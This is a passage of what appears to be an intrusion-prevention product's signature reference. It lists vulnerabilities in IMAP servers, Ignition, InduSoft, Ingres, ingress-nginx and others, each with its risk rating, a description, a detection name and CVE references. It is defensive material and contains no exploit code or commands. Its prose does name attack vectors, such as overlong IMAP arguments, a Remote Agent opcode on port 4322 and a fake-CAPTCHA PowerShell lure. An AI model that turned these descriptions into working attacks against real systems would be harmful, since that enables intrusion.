IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Rename-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Unsubscripe-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Delete-Command

References:

CVE-2005-3690
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3690

BID-15492
http://www.securityfocus.com/bid/15492

OSVDB-20929
http://www.osvdb.org/20929

IMAP-MailEnable-IMAP-Service-Invalid-Command-Buffer-Overflow

About this vulnerability:

MailEnable IMAP service has a stack-based buffer overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-85-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MailEnable

Type:

Buffer Overflow

Description:

MailEnable IMAP service has a stack-based buffer overflow vulnerability. A remote attacker can send one of the affected commands with an excessively long command continuation argument to cause a DoS or compromise the vulnerable server.

Situation:

IMAP_MailEnable-IMAP-Service-Invalid-Command-Buffer-Overflow

References:

BID-21252
http://www.securityfocus.com/bid/21252

OSVDB-30661
http://www.osvdb.org/30661

IMAP-MDaemon-Authenticate-Command-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the processing of authenticate command in MDaemon

Risk:

Moderate

First detected in:

sgpkg-ips-36-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MDaemon

Type:

Buffer Overflow

Description:

The IMAP service of MDaemon email server software has a buffer overflow vulnerability in the handling of authenticate command. A remote attacker can exploit this vulnerability to execute arbitrary code on the victim server.

Situation:

IMAP_Authenticate-Command-Buffer-Overflow-2
IMAP_Authenticate-Command-Buffer-Overflow

References:

BID-14317
http://www.securityfocus.com/bid/14317

IMAP-Mercur-Messaging-IMAP-Service-Buffer-Overflow

About this vulnerability:

Mercur Messaging buffer overflow with long login and select commands

Risk:

High

First detected in:

sgpkg-ips-63-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Mercur Messaging

Type:

Buffer Overflow

Description:

Mercur Messaging 2005 SP3 suffers from a buffer overflow vulnerability in the handling of login and select commands. An unauthenticated attacker can exploit a vulnerability in the handling of the login command by giving an excessively long username argument, causing a DoS or arbitrary code execution. Respectively an authenticated malicious user can exploit the select command handling vulnerability causing the same outcome.

Situation:

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Select-Command
IMAP_Excessively-Long-Username-Argument-In-IMAP-Login-Command

References:

CVE-2006-1255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1255

BID-17138
http://www.securityfocus.com/bid/17138

OSVDB-23950
http://www.osvdb.org/23950

IMAP-Microsoft-Exchange-Server-Literal-Processing-Buffer-Overflow

About this vulnerability:

Buffer overflow in Microsoft Exchange Server when processing IMAP literal octets

Risk:

Moderate

First detected in:

sgpkg-ips-106-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server 2000

Type:

Buffer Overflow

Description:

Certain versions of Microsoft Exchange Server 2000 have a buffer overflow vulnerability in the handling of the IMAP protocol. IMAP protocol messages using the IMAP command continuation method specifying a large number of octets may cause a buffer overflow and memory corruption in the server process. The vulnerability allows remote attackers to perform denial of service attacks on vulnerable Exchange servers.

Situation:

IMAP_Microsoft-Exchange-Server-Literal-Processing-Buffer-Overflow

References:

CVE-2007-0221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0221

BID-23810
http://www.securityfocus.com/bid/23810

OSVDB-34392
http://www.osvdb.org/34392

MS07-026
http://technet.microsoft.com/security/bulletin/MS07-026

IMAP-Novell-NetMail-Buffer-Overflow

About this vulnerability:

Novell NetMail Buffer Overflow Vulnerability

Risk:

High

First detected in:

sgpkg-ips-57-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell NetMail

Type:

Buffer Overflow

Description:

Novell NetMail 3.5 is an e-mail and calendaring system. Novell NetMail has a stack-based buffer overflow vulnerality that can be exploited via a crafted IMAP command that contains long verb arguments. An authenticated remote attacker can cause a DoS or a root/system-level compromise.

Situation:

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Status-Command

References:

CVE-2005-3314
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3314

BID-15491
http://www.securityfocus.com/bid/15491

OSVDB-20956
http://www.osvdb.org/20956

IMAP-Novell-NetMail-IMAP-Append-Command-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Novell NetMail IMAP service

Risk:

Moderate

First detected in:

sgpkg-ips-91-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell NetMail

Type:

Buffer Overflow

Description:

Novell NetMail IMAP service has a stack buffer overflow vulnerability. By sending a crafted APPEND command with an excessively long date/time string, an authenticated remote attacker can cause a denial of service terminating the vulnerable service or compromise the vulnerable system.

Situation:

IMAP_Novell-NetMail-IMAP-Append-Command-Buffer-Overflow

References:

CVE-2006-6425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6425

BID-21729
http://www.securityfocus.com/bid/21729

IMAP-Novell-NetMail-IMAP-Verb-Literal-Heap-Overflow

About this vulnerability:

Novell NetMail IMAP service heap-based buffer overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell NetMail

Type:

Buffer Overflow

Description:

Novell NetMail IMAP service has a heap-based buffer overflow vulnerability. By sending one of the affected commands using the command continuation method with a negative argument length value, a remote attacker can cause a DoS or compromise the vulnerable server.

Situation:

IMAP_Novell-NetMail-IMAP-Verb-Literal-Heap-Overflow

References:

CVE-2006-6424
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6424

BID-21724
http://www.securityfocus.com/bid/21724

IMAP-Novell-NetMail-Large-Literal-Octet-Counter-Buffer-Overflow

About this vulnerability:

Novell NetMail large literal octet counter buffer overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-64-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell NetMail

Type:

Buffer Overflow

Description:

Novell NetMail 3.5 does not handle large literal octet counters correctly. If the maximum integer value is supplied as a counter value, the overflowed integer is used to allocate memory. This causes a buffer oveflow in subsequent data copy operations. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim machine.

Situation:

IMAP_Large-Literal-Octet-Counter-Value

References:

CVE-2005-1758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1758

BID-14718
http://www.securityfocus.com/bid/14718

BID-13926
http://www.securityfocus.com/bid/13926

OSVDB-17239
http://www.osvdb.org/17239

IMAP-Partial-Body-Buffer-Overflow

About this vulnerability:

Buffer overflow in wu-imapd

Risk:

Moderate

First detected in:

sgpkg-ips-137-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

University of Washington imapd

Type:

Buffer Overflow

Description:

An attacker with a valid user account in the remote imap service may launch a buffer-overflow attack by sending an oversized argument with BODY command. If successfully exploited, the buffer-overflow vulnerability allows arbitrary code execution in the remote server.

Situation:

IMAP_WU-IMAPD-Partial-Body-Buffer-Overflow

References:

CVE-2002-0379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0379

BID-4713
http://www.securityfocus.com/bid/4713

IMAP_MailEnable-IMAP-Service-Append-Command-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in MailEnable MailEnable Enterprise

Risk:

High

First detected in:

sgpkg-ips-99-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MailEnable

Type:

Buffer Overflow

Description:

There is a stack buffer overflow in the MailEnable IMAP Service. The vulnerability is due to a boundary error in the IMAP service when processing arguments passed to the APPEND command. Successful exploitation of this vulnerability allows a remote authenticated attacker to create a Denial of Service condition or execute arbitrary code on the vulnerable system in the context of the affected application, commonly System.

Situation:

IMAP_MailEnable-IMAP-Service-Append-Command-Handling-Buffer-Overflow

References:

CVE-2007-1301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1301

BID-22792
http://www.securityfocus.com/bid/22792

IMAP_Mercury-Mail-Transport-System-IMAP-Data-Handling-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Mercury Mail Transport System

Risk:

High

First detected in:

sgpkg-ips-100-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mercury Mail Transport System

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow in Mercury Mail Transport System. The affected product does not properly validate continuation data, allowing a remote unauthenticated attacker to cause a denial of service or execute arbitrary code with the privileges of the vulnerable service process.

Situation:

IMAP_Mercury-Mail-Transport-System-IMAP-Data-Handling-Buffer-Overflow

References:

CVE-2006-5961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5961

BID-21110
http://www.securityfocus.com/bid/21110

iMatix-Corporation-Xitami-Web-Server-BOF

About this vulnerability:

Buffer overflow in iMatix Corporation Xitami Web Server

Risk:

High

First detected in:

sgpkg-ips-643-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Imatix Xitami for Windows

Type:

Buffer Overflow

Description:

A stack based buffer overflow in iMatix Corporation Xitami Web Server which allows a remote attacker to execute arbitrary code via a long If-Modified-Since header.

Situation:

HTTP_CSH-iMatix-Corporation-Xitami-Web-Server-BOF

References:

CVE-2007-5067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5067

BID-25772
http://www.securityfocus.com/bid/25772

OSVDB-40594
http://www.osvdb.org/40594

iMesh-Toolbar

About this vulnerability:	iMesh Internet Explorer Toolbar
Risk:	Low
First detected in:	sgpkg-ips-35-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	iMesh Toolbar
Type:	Misconfiguration
Description:	iMesh toolbar is an internet explorer toolbar bundled with the iMesh peer to peer file shering software. It may show advertisement popus and may be considered unwanted software by some organizations.
Situation:	HTTP_CSH-iMesh-Toolbar-Search HTTP_CSH-iMesh-Toolbar-Popup-Content-Request

Impacket-Generated-Traffic

About this vulnerability:	Impacket generated traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1385-5242
Last changed:	sgpkg-ips-1385-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Impacket generated traffic was detected.
Situation:	SMB-TCP_Impacket-Generated-Traffic

Imperva-SecureSphere-Pws-Command-Injection

About this vulnerability:	A vulnerability in Imperva SecureSphere
Risk:	High
First detected in:	sgpkg-ips-1158-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Imperva SecureSphere
Type:	Input Validation
Description:	A vulnerability in Imperva SecureSphere, versions 13.0 through 13.2, which allows remote attackers to execute arbitrary commands on the target system through the PWS service due to the insufficient sanitization of user supplied command parameters.
Situation:	HTTP_CRL-Imperva-SecureSphere-Pws-Command-Injection

Includer-Command-Execution

About this vulnerability:

Command execution vulnerability in the Includer

Risk:

Moderate

First detected in:

sgpkg-ips-27-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

The Includer

Type:

Metacharacter

Description:

Command execution vulnerability exists with the includer.cgi in the Includer. Remote attacker can exploit this vulnerability to execute arbitrary commands on the Web server.

Situation:

HTTP_CSU-Includer-Command-Execution

References:

CVE-2005-0689
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0689

BID-12738
http://www.securityfocus.com/bid/12738

Incredifind

About this vulnerability:	IncrediFind
Risk:	Low
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	IncrediFind
Type:	Misconfiguration
Description:	Incredifind is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Incredifind

Index-Request-Type

About this vulnerability:	A vulnerable non-standard HTTP request method.
Risk:	Low
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP server
Type:	Insecure Configuration
Description:	A non-standard HTTP INDEX-request allows the attacker to view arbitrary directories in some vulnerable servers.
Situation:	HTTP_CRL-Index-Request-Type

Indexing-Service-Memory-Corruption-CVE-2009-2507

About this vulnerability:

A remote code execution vulnerability in the Indexing Service on Windows systems

Risk:

High

First detected in:

sgpkg-ips-258-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a remote code execution vulnerability in the Indexing Service on Windows systems.

Situation:

HTTP_SS-Indexing-Service-Memory-Corruption-CVE-2009-2507
File-Text_Indexing-Service-Memory-Corruption-CVE-2009-2507

References:

CVE-2009-2507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2507

MS09-057
http://technet.microsoft.com/security/bulletin/MS09-057

Inductive-Automation-Ignition-Abstractgatewayfunction-Insecure-Deserialization

About this vulnerability:

A vulnerability in Inductive Automation Ignition

Risk:

Moderate

First detected in:

sgpkg-ips-1631-5242

Last changed:

sgpkg-ips-1631-5242

Platform:

Generic

Software:

Inductive Automation Ignition

Type:

Input Validation

Description:

An insecure deserialization vulnerability exists in Inductive Automation Ignition. The vulnerability is due to deserialization of untrusted data within the AbstractGatewayFunction class. A remote authenticated attacker could exploit the vulnerabilities by sending crafted requests to the target server. Successful exploitation could result in remote code execution under the security context of SYSTEM on the target server.

Situation:

File-TextId_Inductive-Automation-Ignition-Abstractgatewayfunction-Insecure-Deserialization

References:

CVE-2023-39473
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39473

Inductive-Automation-Ignition-Authenticatedpage-Authentication-Bypass

About this vulnerability:

A vulnerability in Inductive Automation Ignition

Risk:

Moderate

First detected in:

sgpkg-ips-1562-5242

Last changed:

sgpkg-ips-1562-5242

Platform:

Generic

Software:

Inductive Automation Ignition

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in Inductive Automation Ignition. The vulnerability is due to improper use of the Apache Wicket web application framework. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the attacker being able to read or modify parts of the target server configuration and data.

Situation:

HTTP_CS-Inductive-Automation-Ignition-Authenticatedpage-Authentication-Bypass

References:

CVE-2022-35869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35869

Inductive-Automation-Ignition-Base64element-Insecure-Deserialization

About this vulnerability:

A vulnerability in Inductive Automation Ignition

Risk:

High

First detected in:

sgpkg-ips-1704-5242

Last changed:

sgpkg-ips-1704-5242

Platform:

Generic

Software:

Inductive Automation Ignition

Type:

Input Validation

Description:

An insecure deserialization vulnerability exists in Inductive Automation Ignition. The vulnerability is due to improper input validation in the Base64Element class. Successfully exploiting this vulnerability could result in remote code execution in the security context of SYSTEM.

Situation:

File-TextId_Inductive-Automation-Ignition-Base64element-Insecure-Deserialization

References:

CVE-2023-50220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50220

Inductive-Automation-Ignition-ModuleInvoke-Insecure-Deserialization

About this vulnerability:

A vulnerability in Inductive Automation Ignition

Risk:

Moderate

First detected in:

sgpkg-ips-1692-5242

Last changed:

sgpkg-ips-1692-5242

Platform:

Generic

Software:

Inductive Automation Ignition

Type:

Input Validation

Description:

An insecure deserialization vulnerability exists in Inductive Automation Ignition. The vulnerability is due to deserialization of untrusted data within the ModuleInvoke class. A remote authenticated attacker could exploit the vulnerabilities by sending crafted requests to the target server. Successful exploitation could result in remote code execution under the security context of SYSTEM on the target server.

Situation:

File-TextId_Inductive-Automation-Ignition-ModuleInvoke-Insecure-Deserialization

References:

CVE-2023-50218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50218

Inductive-Automation-Ignition-OPC-UA-Client-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Inductive Automation Ignition

Risk:

High

First detected in:

sgpkg-ips-1643-5242

Last changed:

sgpkg-ips-1643-5242

Platform:

Generic

Software:

Inductive Automation Ignition

Type:

Input Validation

Description:

A cross-site scripting vulnerability exists in Inductive Automation Ignition. The vulnerability is due to lack of validating user provided data within OPC UA Client. An attacker could exploit the vulnerabilities by enticing the target user to connect to a malicious server. Successful exploitation could result in remote code execution under the security context of SYSTEM on the target server.

Situation:

Generic_SS-Inductive-Automation-Ignition-OPC-UA-Client-Cross-Site-Scripting

References:

CVE-2023-38124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38124

Inductive-Automation-Ignition-Project-Deserialization

About this vulnerability:

A vulnerability in Inductive Automation Ignition

Risk:

High

First detected in:

sgpkg-ips-1267-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Inductive Automation Ignition

Type:

Input Validation

Description:

There exists a vulnerability in Inductive Automation Ignition, multiple versions, which allows remote attackers to obtain sensitive information due to the lack of proper user input validation.

Situation:

HTTP_CRL-Inductive-Automation-Ignition-Project-Deserialization

References:

CVE-2020-10644
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10644

Inductive-Automation-Ignition-runQuery-Insecure-Deserialization

About this vulnerability:

A vulnerability in Inductive Automation Ignition

Risk:

Moderate

First detected in:

sgpkg-ips-1698-5242

Last changed:

sgpkg-ips-1698-5242

Platform:

Generic

Software:

Inductive Automation Ignition

Type:

Input Validation

Description:

An insecure deserialization vulnerability exists in Inductive Automation Ignition. The vulnerability is due to deserialization of untrusted data within the RunQuery class. Successful exploitation could result in remote code execution under the security context of SYSTEM on the target server.

Situation:

File-TextId_Inductive-Automation-Ignition-runQuery-Insecure-Deserialization

References:

CVE-2023-50219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50219

Inductive-Automation-Ignition-Servermessage-Insecure-Deserialization

About this vulnerability:

A vulnerability in Inductive Automation Ignition

Risk:

High

First detected in:

sgpkg-ips-1580-5242

Last changed:

sgpkg-ips-1580-5242

Platform:

Generic

Software:

Inductive Automation Ignition

Type:

Input Validation

Description:

An insecure deserialization vulnerability exists in Inductive Automation Ignition. The vulnerability is due to deserialization of untrusted data when processing ServerMessage messages. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in remote code execution under the security context of SYSTEM on the target server.

Situation:

File-Binary_Inductive-Automation-Ignition-Servermessage-Insecure-Deserialization

References:

CVE-2022-35870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35870

Inductive-Automation-Ignition-Servermessageheader-Insecure-Deserialization

About this vulnerability:

A vulnerability in Inductive Automation Ignition

Risk:

Moderate

First detected in:

sgpkg-ips-1260-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Inductive Automation Ignition

Type:

Input Validation

Description:

Insecure deserialization of user-sent objects causes a vulnerability in Inductive Automation Ignition. A successful exploit may allow an attacker to execute arbitrary code on the target system with the privileges of the affected process.

Situation:

HTTP_CS-Inductive-Automation-Ignition-Servermessageheader-Insecure-Deserialization

References:

CVE-2020-12000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12000

Indusoft-CEServer-Buffer-Overflow

About this vulnerability:	A vulnerability in InduSoft CEServer
Risk:	High
First detected in:	sgpkg-ips-608-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	InduSoft CEServer
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in in InduSoft CEServer which allows remote attacker to execute malicious code on target system.
Situation:	Generic_CS-Indusoft-CEServer-Buffer-Overflow

Indusoft-Thin-Client-ActiveX-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in InduSoft Thin Client

Risk:

Moderate

First detected in:

sgpkg-ips-477-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

InduSoft Thin Client

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in InduSoft Thin Client. The vulnerability is due to lack of input validation on the InternationalSeparator parameter of the ISSYMBOL.ISSymbolCtrl ActiveX control. An attacker can exploit this vulnerability by enticing the user to browse to a specially crafted web page using Internet Explorer. Successful exploitation can result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Text_Indusoft-Thin-Client-ActiveX-Heap-Buffer-Overflow

References:

CVE-2011-0340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0340

BID-47596
http://www.securityfocus.com/bid/47596

OSVDB-72865
http://www.osvdb.org/72865

Indusoft-Thin-Client-ISSymbol-ActiveX-InternationalOrder-Heap-BOF

About this vulnerability:

A vulnerability in InduSoft Thin Client

Risk:

Moderate

First detected in:

sgpkg-ips-475-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

InduSoft Thin Client

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in the InduSoft Thin Client. The vulnerability is due to lack of input validation on the InternationalOrder parameter of the ISSYMBOL.ISSymbolCtrl ActiveX control. An attacker can exploit this vulnerability by enticing the user to browse to a specially crafted webpage using Internet Explorer. Successful exploitation can result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Text_Indusoft-Thin-Client-ISSymbol-ActiveX-InternationalOrder-Heap-BOF

References:

CVE-2011-0340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0340

BID-47596
http://www.securityfocus.com/bid/47596

OSVDB-72865
http://www.osvdb.org/72865

Indusoft-Web-Studio-Remote-Agent-Buffer-Overflow

About this vulnerability:

A vulnerability in InduSoft Web Studio

Risk:

High

First detected in:

sgpkg-ips-427-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

InduSoft Web Studio

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability has been identified in the Remote Agent component of InduSoft Web Studio. The vulnerability is due to an insufficient boundary check when copying user supplied data using the "Remove File" (0x15) operation. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to port 4322/TCP. In the event of a successful attack, attacker code will be executed in the security context of the target user running the Remote Agent component.

Situation:

Generic_CS-Indusoft-Web-Studio-Remote-Agent-Buffer-Overflow

References:

CVE-2011-4052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4052

Indusoft-Web-Studio-Remote-File-Access

About this vulnerability:

A Indusoft Web Studio Remote File Access vulnerability.

Risk:

High

First detected in:

sgpkg-ips-715-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

InduSoft Web Studio

Type:

Directory Traversal

Description:

A vulnerability in NTWebServer in InduSoft Web Studio, versions 6.1 and 7.x before 7.0+Patch 1, which allows remote attackers to execute arbitrary code and read arbitrary files on the remote system via a directory traversal.

Situation:

Generic_CS-Indusoft-Web-Studio-Unauthenticated-Insecure-Remote-Operations

References:

CVE-2011-1900
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1900

BID-47842
http://www.securityfocus.com/bid/47842

OSVDB-73413
http://www.osvdb.org/73413

Indusoft-Web-Studio-sDoS-Denial-Of-Service

About this vulnerability:	Indusoft Web Studio sDoS denial of service.
Risk:	High
First detected in:	sgpkg-ips-628-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	InduSoft Web Studio
Type:	Buffer Overflow
Description:	A heap overflow vulnerability in Indusoft Web Studio that allows a remote attacker to crash the service by sending a specially crafted HTTP request.
Situation:	HTTP_CSU-Indusoft-Web-Studio-sDoS-Denial-Of-Service

Indusoft-Web-Studio-Unauthenticated-Insecure-Remote-Operations

About this vulnerability:

A vulnerability in InduSoft Web Studio

Risk:

Moderate

First detected in:

sgpkg-ips-431-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

InduSoft Web Studio

Type:

Malfunction

Description:

A code execution vulnerability has been identified in the Remote Agent component of InduSoft Web Studio. The vulnerability is due to the absence of authentication for incoming requests to the Remote Agent service. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service. In the event of a successful attack, attacker code will be executed in the security context of the target user.

Situation:

References:

CVE-2011-4051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4051

OSVDB-77179
http://www.osvdb.org/77179

Information-Stealer-Using-Fake-Captcha

About this vulnerability:	An attempt to install malware via fake CAPTCHA detected
Risk:	High
First detected in:	sgpkg-ips-1815-5242
Last changed:	sgpkg-ips-1815-5242
Platform:	Windows
Software:	Any Software
Type:	Input Validation
Description:	In a large-scale fake CAPTCHA campaign analyzed by Guardio Labs, the CAPTCHA page includes a JavaScript snippet that silently copies a malicious PowerShell command to the victim's clipboard. It then gives instructions to the victim on how to paste the "CAPTCHA solution" into the Windows Run dialog and execute it. Once the PowerShell command is executed, it downloads the Lumma Stealer from a remote server and executes it on the victim's device. This fingerprint detects such fake CAPTCHA pages.
Situation:	File-Text_Information-Stealer-Using-Fake-Browser-Dialogs

Ingres-Database-Communications-Server-Component-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Ingres Ingres Database

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ingres Database

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Ingres Database Communications Server. The vulnerability is due to insufficient boundary check when handling user supplied data. A remote unauthenticated attacker may leverage this vulnerability by sending a specially crafted request. Successful exploitation may cause the execution of arbitrary code on the target system with SYSTEM privileges. If code injection attack is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security of the affected process, commonly the SYSTEM account on Windows platforms. In an attack case where code injection is not successful, the Communications Server process will terminate abnormally, creating a denial-of-service condition.

Situation:

Generic_CS-Ingres-Database-Communications-Server-Component-Heap-Buffer-Overflow

References:

CVE-2007-3334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334

BID-24585
http://www.securityfocus.com/bid/24585

OSVDB-37488
http://www.osvdb.org/37488

OSVDB-37487
http://www.osvdb.org/37487

Ingres-Database-Iidbms-Heap-Overflow

About this vulnerability:	A vulnerability in Ingres Ingres Database
Risk:	High
First detected in:	sgpkg-ips-286-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Ingres Database
Type:	Buffer Overflow
Description:	A vulnerability exists in Ingres Database that could be exploited by remote attackers to compromise a vulnerable system. The vulnerability is due to insufficient boundary checking in the iidbms component of the Ingres Database. Remote unauthenticated attackers could exploit this vulnerability by sending a specially crafted request to the database server. Successful exploitation would cause a heap buffer overflow that could cause a denial of service, or allow execution of arbitrary code with the privileges of the affected process.
Situation:	Generic_CS-Ingres-Database-Iidbms-Heap-Overflow Generic_CS-Ingres-Database-Iidbms-Heap-Overflow-2

Ingres-Database-Iidbms-Heap-Overflow-3

About this vulnerability:

A vulnerability in the Ingres Database

Risk:

Moderate

First detected in:

sgpkg-ips-689-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ingres Database

Type:

Buffer Overflow

Description:

There is an buffer length validation error in the Ingres Database Server. The application fails to perform adequate boundary checks for a length field, which is treated as a signed integer.

Situation:

Generic_CS-Ingres-Database-Iidbms-Heap-Overflow-3

References:

BID-38001
http://www.securityfocus.com/bid/38001

OSVDB-62080
http://www.osvdb.org/62080

Ingres-Database-Uuid-From-Char-Stack-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Ingres Database Server

Risk:

High

First detected in:

sgpkg-ips-113-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ingres Database

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Ingres Database Server. An attacker with valid privileges of table operations to the database can cause a denial of service or compromise the vulnerable system.

Situation:

Generic_Ingres-Database-Uuid-From-Char-Stack-Buffer-Overflow

References:

CVE-2007-3338
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338

BID-24585
http://www.securityfocus.com/bid/24585

OSVDB-37483
http://www.osvdb.org/37483

Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-1097

About this vulnerability:

An attempt to exploit a vulnerability in Ingress NGINX Controller for Kubernetes

Risk:

High

First detected in:

sgpkg-ips-1856-5242

Last changed:

sgpkg-ips-1856-5242

Platform:

Generic

Software:

ingress-nginx

Type:

Input Validation

Description:

A security issue was discovered in ingress-nginx where the "auth-tls-match-cn" ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of secrets accessible to the controller.

Situation:

File-Text_Ingress-Nginx-Controller-Kubernetes-Annotation-Injection

References:

CVE-2025-1097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1097

Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-1098

About this vulnerability:

An attempt to exploit a vulnerability in Ingress NGINX Controller for Kubernetes

Risk:

High

First detected in:

sgpkg-ips-1856-5242

Last changed:

sgpkg-ips-1856-5242

Platform:

Generic

Software:

ingress-nginx

Type:

Input Validation

Description:

A security issue was discovered in ingress-nginx where the "mirror-target" and "mirror-host" Ingress annotations can be used to inject arbitrary configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of secrets accessible to the controller.

Situation:

File-Text_Ingress-Nginx-Controller-Kubernetes-Annotation-Injection

References:

CVE-2025-1098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1098

Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-1974

About this vulnerability:

An attempt to exploit a vulnerability in Ingress NGINX Controller for Kubernetes

Risk:

High

First detected in:

sgpkg-ips-1856-5242

Last changed:

sgpkg-ips-1856-5242

Platform:

Generic

Software:

ingress-nginx

Type:

Input Validation

Description:

A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of secrets accessible to the controller.

Situation:

File-Text_Ingress-Nginx-Controller-Kubernetes-Annotation-Injection

References:

CVE-2025-1974
